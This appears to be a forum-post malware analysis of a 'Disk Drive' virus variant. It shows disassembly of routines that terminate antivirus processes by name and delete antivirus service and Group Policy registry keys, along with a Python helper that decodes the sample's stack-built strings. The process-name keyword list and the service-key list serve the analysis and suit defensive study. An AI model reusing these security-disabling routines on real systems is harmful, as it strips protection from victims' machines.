The following is only a fragment of the code of a 磁碟机 (Disk Drive virus) variant; friends who know assembly can take a look at it !!!
00402111 |> /8D85 E4FEFFFF /LEA EAX,DWORD PTR SS:[EBP-11C]
00402117 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
0040211A |. |50 |PUSH EAX
0040211B |. |E8 32680000 |CALL <JMP.&MFC42.#860_??4CString@@QAEAB>
00402120 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402123 |. |E8 24680000 |CALL <JMP.&MFC42.#4202_?MakeLower@CStri>
00402128 |. |68 54D44000 |PUSH setup.0040D454 ; rav
0040212D |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402130 |. |E8 11680000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402135 |. |3BC3 |CMP EAX,EBX
00402137 |. |75 77 |JNZ SHORT setup.004021B0
00402139 |. |68 50D44000 |PUSH setup.0040D450 ; avp
0040213E |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402141 |. |E8 00680000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402146 |. |3BC3 |CMP EAX,EBX
00402148 |. |75 66 |JNZ SHORT setup.004021B0
0040214A |. |68 48D44000 |PUSH setup.0040D448 ; twister
0040214F |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402152 |. |E8 EF670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402157 |. |3BC3 |CMP EAX,EBX
00402159 |. |75 55 |JNZ SHORT setup.004021B0
0040215B |. |68 44D44000 |PUSH setup.0040D444 ; kv
00402160 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402163 |. |E8 DE670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402168 |. |3BC3 |CMP EAX,EBX
0040216A |. |75 44 |JNZ SHORT setup.004021B0
0040216C |. |68 3CD44000 |PUSH setup.0040D43C ; watch
00402171 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402174 |. |E8 CD670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
00402179 |. |3BC3 |CMP EAX,EBX
0040217B |. |75 33 |JNZ SHORT setup.004021B0
0040217D |. |68 34D44000 |PUSH setup.0040D434 ; kissvc
00402182 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402185 |. |E8 BC670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
0040218A |. |3BC3 |CMP EAX,EBX
0040218C |. |75 22 |JNZ SHORT setup.004021B0
0040218E |. |68 2CD44000 |PUSH setup.0040D42C ; scan
00402193 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00402196 |. |E8 AB670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
0040219B |. |3BC3 |CMP EAX,EBX
0040219D |. |75 11 |JNZ SHORT setup.004021B0
0040219F |. |68 24D44000 |PUSH setup.0040D424 ; guard
004021A4 |. |8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
004021A7 |. |E8 9A670000 |CALL <JMP.&MFC42.#2764_?Find@CString@@Q>
004021AC |. |3BC3 |CMP EAX,EBX
004021AE |. |74 25 |JE SHORT setup.004021D5
004021B0 |> |FFB5 C8FEFFFF |PUSH DWORD PTR SS:[EBP-138] ; /ProcessId
004021B6 |. |6A 00 |PUSH 0 ; |Inheritable = FALSE
004021B8 |. |68 FF0F1F00 |PUSH 1F0FFF ; |Access = PROCESS_ALL_ACCESS
004021BD |. |FF15 60A04000 |CALL DWORD PTR DS:[<&KERNEL32.OpenProce>; \OpenProcess
004021C3 |. |8BF0 |MOV ESI,EAX
004021C5 |. |85F6 |TEST ESI,ESI
004021C7 |. |74 09 |JE SHORT setup.004021D2
004021C9 |. |6A 01 |PUSH 1 ; /ExitCode = 1
004021CB |. |56 |PUSH ESI ; |hProcess
004021CC |. |FF15 64A04000 |CALL DWORD PTR DS:[<&KERNEL32.Terminate>; \TerminateProcess
004021D2 |> |56 |PUSH ESI
004021D3 |. |FFD7 |CALL EDI
004021D5 |> |8D85 C0FEFFFF |LEA EAX,DWORD PTR SS:[EBP-140]
004021DB |. |50 |PUSH EAX ; /pProcessentry
004021DC |. |FF75 E8 |PUSH DWORD PTR SS:[EBP-18] ; |hSnapshot
004021DF |. |E8 5C6A0000 |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
004021E4 |. |85C0 |TEST EAX,EAX
004021E6 |.^\0F85 25FFFFFF \JNZ setup.00402111
Checks whether the process name contains rav, avp, twister, kv, watch, kissvc, scan or guard; if it does, the process is killed with TerminateProcess.
The behaviour before this is restoring the SSDT by loading netapi00.sys.
After this it deletes certain antivirus services or driver keys.
004054BE . 57 PUSH EDI
004054BF . 6A 63 PUSH 63
004054C1 . 6A 69 PUSH 69
004054C3 . 6A 76 PUSH 76
004054C5 . 53 PUSH EBX
004054C6 . 57 PUSH EDI
004054C7 . 6A 53 PUSH 53
004054C9 . 58 POP EAX
004054CA . 50 PUSH EAX
004054CB . 6A 43 PUSH 43
004054CD . 6A 56 PUSH 56
004054CF . 50 PUSH EAX
004054D0 . 6A 50 PUSH 50
004054D2 . 6A 4D PUSH 4D
004054D4 . 6A 5C PUSH 5C
004054D6 . 6A 73 PUSH 73
004054D8 . 57 PUSH EDI
004054D9 . 6A 63 PUSH 63
004054DB . 6A 69 PUSH 69
004054DD . 6A 76 PUSH 76
004054DF . 53 PUSH EBX
004054E0 . 57 PUSH EDI
004054E1 . 50 PUSH EAX
004054E2 . 6A 5C PUSH 5C
004054E4 . 6A 74 PUSH 74
004054E6 . 57 PUSH EDI
004054E7 . 50 PUSH EAX
004054E8 . 6A 6C PUSH 6C
004054EA . 6A 6F PUSH 6F
004054EC . 53 PUSH EBX
004054ED . 6A 74 PUSH 74
004054EF . 6A 6E PUSH 6E
004054F1 . 6A 6F PUSH 6F
004054F3 . 6A 43 PUSH 43
004054F5 . 6A 74 PUSH 74
004054F7 . 6A 6E PUSH 6E
004054F9 . 57 PUSH EDI
004054FA . 53 PUSH EBX
004054FB . 53 PUSH EBX
004054FC . 6A 75 PUSH 75
004054FE . 6A 43 PUSH 43
00405500 . 6A 5C PUSH 5C
00405502 . 6A 4D PUSH 4D
00405504 . 6A 45 PUSH 45
00405506 . 6A 54 PUSH 54
00405508 . 50 PUSH EAX
00405509 . 6A 59 PUSH 59
0040550B . 50 PUSH EAX
0040550C . 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040550F . 68 04DC4000 PUSH setup.0040DC04 ; %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
00405514 . 50 PUSH EAX
00405515 . E8 20340000 CALL <JMP.&MFC42.#2818_?Format@CString@@>
0040551A . 81C4 CC000000 ADD ESP,0CC
00405520 . 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
00405523 . 8BCC MOV ECX,ESP
00405525 . 8965 E0 MOV DWORD PTR SS:[EBP-20],ESP
00405528 . 50 PUSH EAX
00405529 . E8 12340000 CALL <JMP.&MFC42.#535_??0CString@@QAE@AB>
After this sequence executes, the string obtained is SYSTEM\CurrentControlSet\Services\MPSVCService
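The PUSH-one-character-at-a-time idiom above, combined with a "%c%c%c..." CString::Format call, hides the registry path from a plain strings scan. As an added analyst helper (not code from the original post), the Python script below replays the PUSH/POP sequence from an OllyDbg listing and reads the string back off the stack. It handles the general case of this idiom (any number of characters, hex immediates, register pushes, and the PUSH imm / POP reg trick), not only this one string. The listing embedded in it is the sequence shown above, constructed here as input; the starting values of EBX and EDI are not visible in the excerpt and are assumed to be 'r' and 'e', as inferred from the result string the post reports.

```python
"""Recover a string that a binary builds with per-character PUSHes and a
"%c%c%c..." Format call (added analyst helper, not code from the post)."""
import re

# Constructed input: the PUSH/POP sequence shown in the post, in OllyDbg
# listing format. Lines that carry no PUSH or POP are ignored by the parser.
LISTING = """\
004054BE . 57 PUSH EDI
004054BF . 6A 63 PUSH 63
004054C1 . 6A 69 PUSH 69
004054C3 . 6A 76 PUSH 76
004054C5 . 53 PUSH EBX
004054C6 . 57 PUSH EDI
004054C7 . 6A 53 PUSH 53
004054C9 . 58 POP EAX
004054CA . 50 PUSH EAX
004054CB . 6A 43 PUSH 43
004054CD . 6A 56 PUSH 56
004054CF . 50 PUSH EAX
004054D0 . 6A 50 PUSH 50
004054D2 . 6A 4D PUSH 4D
004054D4 . 6A 5C PUSH 5C
004054D6 . 6A 73 PUSH 73
004054D8 . 57 PUSH EDI
004054D9 . 6A 63 PUSH 63
004054DB . 6A 69 PUSH 69
004054DD . 6A 76 PUSH 76
004054DF . 53 PUSH EBX
004054E0 . 57 PUSH EDI
004054E1 . 50 PUSH EAX
004054E2 . 6A 5C PUSH 5C
004054E4 . 6A 74 PUSH 74
004054E6 . 57 PUSH EDI
004054E7 . 50 PUSH EAX
004054E8 . 6A 6C PUSH 6C
004054EA . 6A 6F PUSH 6F
004054EC . 53 PUSH EBX
004054ED . 6A 74 PUSH 74
004054EF . 6A 6E PUSH 6E
004054F1 . 6A 6F PUSH 6F
004054F3 . 6A 43 PUSH 43
004054F5 . 6A 74 PUSH 74
004054F7 . 6A 6E PUSH 6E
004054F9 . 57 PUSH EDI
004054FA . 53 PUSH EBX
004054FB . 53 PUSH EBX
004054FC . 6A 75 PUSH 75
004054FE . 6A 43 PUSH 43
00405500 . 6A 5C PUSH 5C
00405502 . 6A 4D PUSH 4D
00405504 . 6A 45 PUSH 45
00405506 . 6A 54 PUSH 54
00405508 . 50 PUSH EAX
00405509 . 6A 59 PUSH 59
0040550B . 50 PUSH EAX
"""

# The excerpt does not show where EBX and EDI are loaded. Assumption: their
# values are inferred from the result string the post reports ('r' and 'e').
INITIAL_REGS = {"EBX": 0x72, "EDI": 0x65}

# Matches "PUSH EDI", "PUSH 63" or "POP EAX" wherever it sits in an OllyDbg line.
OP_RE = re.compile(r"\b(PUSH|POP)\s+(E[A-D]X|E[SD]I|E[BS]P|[0-9A-F]+)\b")


def simulate_pushes(listing, regs):
    """Replay the PUSH/POP instructions; return the pushed values in push order.
    A 'PUSH imm / POP reg' pair (PUSH 53 / POP EAX above) loads the register
    so later 'PUSH reg' lines push that value."""
    regs = dict(regs)
    stack = []
    for line in listing.splitlines():
        m = OP_RE.search(line)
        if not m:
            continue
        op, operand = m.group(1), m.group(2)
        if op == "POP":
            regs[operand] = stack.pop()
        elif operand in regs:
            stack.append(regs[operand])
        elif re.fullmatch(r"[0-9A-F]+", operand):
            stack.append(int(operand, 16))  # OllyDbg prints immediates in hex
        else:
            raise ValueError(f"register {operand} pushed before it was assigned")
    return stack


def decode_stack_string(listing, regs=INITIAL_REGS):
    """cdecl varargs are pushed last-argument-first, so the last PUSH is the
    first %c: the string reads from the top of the stack downwards."""
    return "".join(chr(v) for v in reversed(simulate_pushes(listing, regs)))


if __name__ == "__main__":
    print(decode_stack_string(LISTING))
```

Running it prints the same SYSTEM\CurrentControlSet\Services\MPSVCService path the post reports, which confirms the register assumptions; the same helper can be pointed at the other Format call sites in the sample to list every service key it targets without single-stepping each one in the debugger.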
Next, at 00401FE6:
00401FE6 /$ B8 3C914000 MOV EAX,setup.0040913C
00401FEB |. E8 406A0000 CALL <JMP.&MSVCRT._EH_prolog>
00401FF0 |. 51 PUSH ECX
00401FF1 |. 53 PUSH EBX
00401FF2 |. 56 PUSH ESI
00401FF3 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10]
00401FF6 |. 33DB XOR EBX,EBX
00401FF8 |. 50 PUSH EAX ; /pHandle
00401FF9 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
00401FFE |. 53 PUSH EBX ; |Reserved => 0
00401FFF |. BE 02000080 MOV ESI,80000002 ; |
00402004 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |Subkey
00402007 |. 56 PUSH ESI ; |hKey => HKEY_LOCAL_MACHINE
00402008 |. FF15 3CA04000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKeyExA>] ; \\RegOpenKeyExA
0040200E |. 85C0 TEST EAX,EAX
00402010 |. 75 15 JNZ SHORT setup.00402027
00402012 |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; /SubKey
00402015 |. 56 PUSH ESI ; |hKey => HKEY_LOCAL_MACHINE
00402016 |. FF15 D8A34000 CALL DWORD PTR DS:[<&SHLWAPI.SHDeleteKeyA>] ; \\SHDeleteKeyA
0040201C |. FF75 F0 PUSH DWORD PTR SS:[EBP-10] ; /hKey
0040201F |. FF15 0CA04000 CALL DWORD PTR DS:[<&ADVAPI32.RegCloseKey>] ; \\RegCloseKey
00402025 |. B3 01 MOV BL,1
00402027 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
0040202B |. 8D4D 08 LEA ECX,DWORD PTR SS:[EBP+8]
0040202E |. E8 FF670000 CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
00402033 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C]
00402036 |. 8AC3 MOV AL,BL
00402038 |. 5E POP ESI
00402039 |. 5B POP EBX
0040203A |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
00402041 |. C9 LEAVE
00402042 \. C3 RETN
Deletes the service.
Other services deleted afterwards by the same method include:
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\MPSVCService"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\AntiVirService"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\klif"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\KAVBase"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\ekrn"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\SymEvent"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\PAVSRV"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\tmmbd"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\McShield"
0013E130 01060178 ASCII "SYSTEM\CurrentControlSet\Services\HookSys"
It also deletes SOFTWARE\Policies\Microsoft\Windows\Safer and
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects (Group Policy).
Finally, the way it exits:
0040615F . FF75 A8 PUSH DWORD PTR SS:[EBP-58] ; /Title 0013E130 01060058 ASCII "MCI Program Com Application"
00406162 . FF75 EC PUSH DWORD PTR SS:[EBP-14] ; |Class = "#32770"
00406165 . FF15 30A44000 CALL DWORD PTR DS:[<&USER32.FindWindowA>; \FindWindowA
0040616B . 50 PUSH EAX
0040616C . E8 0B280000 CALL <JMP.&MFC42.#2864_?FromHandle@CWnd>
00406171 . 85C0 TEST EAX,EAX
00406173 . 75 6F JNZ SHORT setup.004061E4
004061E4 > \6A 00 PUSH 0 ; /status = 0
004061E6 . FF15 7CA34000 CALL DWORD PTR DS:[<&MSVCRT.exit>] ; \exit
Checks whether a window named "MCI Program Com Application" exists.